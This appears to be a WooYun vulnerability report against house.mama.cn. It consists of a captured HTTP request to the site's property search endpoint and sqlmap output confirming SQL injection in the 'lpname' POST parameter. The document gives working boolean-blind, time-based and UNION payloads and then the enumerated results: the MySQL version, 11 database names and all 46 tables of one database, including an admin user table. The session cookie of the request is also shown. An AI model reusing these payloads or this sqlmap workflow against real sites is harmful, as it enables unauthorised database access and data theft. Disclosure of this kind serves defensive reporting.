WooYun.org

POST /index.php?a=index&&g=Loupan&m=Search HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://house.mama.cn
Cookie: PHPSESSID=1hva6rnsv4n5qbvd1bgms9kk45; liveCity=gz; xloginmama_service=http%253A%252F%252Fhouse.mama.cn; MAMADATA53=mama_rp=0&si=c0f92e0a5686619288df116ad6a96749&ltime=1448121306945&rtime=0&sinfid=1&sinpage=__&location=http%3A%2F%2Fhouse.mama.cn%2F; zbd10_Loupan-Search-index=1; zbd10_House-Index-index=1
Host: house.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
areaid=&lpid=0&lpname=-1&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=

sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
---
Parameter: lpname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: areaid=&lpid=0&lpname=-7778') OR 6498=6498 AND ('qDIr'='qDIr&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: areaid=&lpid=0&lpname=-1') AND SLEEP(5) AND ('BjkF'='BjkF&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: areaid=&lpid=0&lpname=-1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786271,0x4d44627454694f5772506b7a7a626b446546735a6762665a52685358545573637a6562657a726c67,0x7171706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner:    '5.6.23-log'

web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner:    '5.6.23-log'
available databases [11]:
[*] baby_grow
[*] home
[*] house_mamadb
[*] information_schema
[*] jiaju_del
[*] mama_living_expense
[*] mamaPhoto_del
[*] mysql
[*] performance_schema
[*] pinpai
[*] test

Database: house_mamadb
[46 tables]
+---------------------------+
| h_admin_user              |
| housesina_art             |
| housesina_art_1           |
| housewangyi_photo         |
| hs_category               |
| hs_category_config        |
| hs_city                   |
| hs_collect_data           |
| hs_collect_data_content   |
| hs_collect_rule           |
| hs_collect_source         |
| hs_collect_source_cate    |
| hs_edit_block             |
| hs_edit_block_bk20121103  |
| hs_edit_history           |
| hs_forum_house_thread     |
| hs_house_loupan_link_cate |
| hs_house_loupan_link_list |
| hs_house_tclink_cate      |
| hs_house_tclink_list      |
| hs_loupan                 |
| hs_loupan_developer       |
| hs_loupan_group           |
| hs_loupan_info            |
| hs_loupan_map             |
| hs_loupan_paihang         |
| hs_loupan_price           |
| hs_loupan_tongji          |
| hs_news                   |
| hs_news_20110908          |
| hs_news_cate              |
| hs_news_comments          |
| hs_news_hot               |
| hs_news_pic               |
| hs_news_tongji            |
| hs_news_tongji_detail     |
| hs_news_zt_cate           |
| hs_news_zt_list           |
| hs_photo_cate             |
| hs_photo_pic              |
| hs_photo_tongji           |
| hs_photo_tuku             |
| hs_sends                  |
| hs_tuan                   |
| hs_tuan_activity          |
| hs_tuan_activity_pic      |
+---------------------------+